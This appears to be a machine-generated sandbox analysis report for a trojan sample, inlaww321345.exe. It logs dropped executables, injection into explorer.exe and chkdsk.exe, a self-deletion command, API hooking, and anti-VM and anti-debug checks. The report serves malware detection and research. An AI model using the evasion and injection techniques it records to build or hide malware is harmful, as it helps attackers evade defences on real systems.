          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A490 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A410 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A35A NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A492 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A45A NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A53A NtAllocateVirtualMemory,
          Source: inlaww321345.exeVirustotal: Detection: 53%
          Source: inlaww321345.exeReversingLabs: Detection: 56%
          Source: C:\Users\user\Desktop\inlaww321345.exeFile read: C:\Users\user\Desktop\inlaww321345.exe
          Source: inlaww321345.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\inlaww321345.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\inlaww321345.exe "C:\Users\user\Desktop\inlaww321345.exe"
          Source: C:\Users\user\Desktop\inlaww321345.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\inlaww321345.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
          Source: C:\Users\user\Desktop\inlaww321345.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\inlaww321345.exeFile created: C:\Users\user\AppData\Local\Temp\nsuD94A.tmp
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/2
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\inlaww321345.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCommand line argument: ^F;
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCommand line argument: ^F;
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: inlaww321345.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\nwmcc\xasivn\insq\a82874181cac4c8c8d839f9e6026f5f4\nkrdof\moxadzwk\Release\moxadzwk.pdb source: inlaww321345.exe, 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp, idczzzzbpy.exe, 00000001.00000000.239867122.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, idczzzzbpy.exe, 00000002.00000000.244915451.00000000003BE000.00000002.00000001.01000000.00000004.sdmp, chkdsk.exe, 00000010.00000002.507707421.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.509886446.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, nsuD94B.tmp.0.dr, idczzzzbpy.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: idczzzzbpy.exe, 00000001.00000003.245625219.000000001A210000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000001.00000003.242881004.000000001A080000.00000004.00001000.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: idczzzzbpy.exe, idczzzzbpy.exe, 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.251002261.0000000001304000.00000004.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000002.320891841.000000000175F000.00000040.00000800.00020000.00000000.sdmp, idczzzzbpy.exe, 00000002.00000003.253061392.00000000014AD000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000010.00000003.319381710.0000000005057000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000010.00000003.321067477.00000000051F7000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B2445 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B2445 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_004168D5 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041E9A8 push dword ptr [25B3BB99h]; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00416CD3 push esi; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00417CF5 pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D4B5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D56C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D502 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D50B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0540D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_009868D5 push ebp; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098E9A8 push dword ptr [25B3BB99h]; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00986CD3 push esi; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00987CF5 pushfd ; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D50B push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D502 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D56C push eax; ret
          Source: C:\Users\user\Desktop\inlaww321345.exeFile created: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B1890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\inlaww321345.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000979904 second address: 000000000097990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000979B7E second address: 0000000000979B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 4232Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeAPI coverage: 4.1 %
          Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 9.0 %
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\Desktop\inlaww321345.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000005.00000000.305108660.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: explorer.exe, 00000005.00000000.295963251.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000005.00000000.306086683.0000000008400000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.296016880.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.301612924.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.279924875.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000005.00000000.305220626.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 00000005.00000000.305108660.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.305285676.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B7A95 IsDebuggerPresent,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B86ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01669100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01731074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01680050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01680050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]
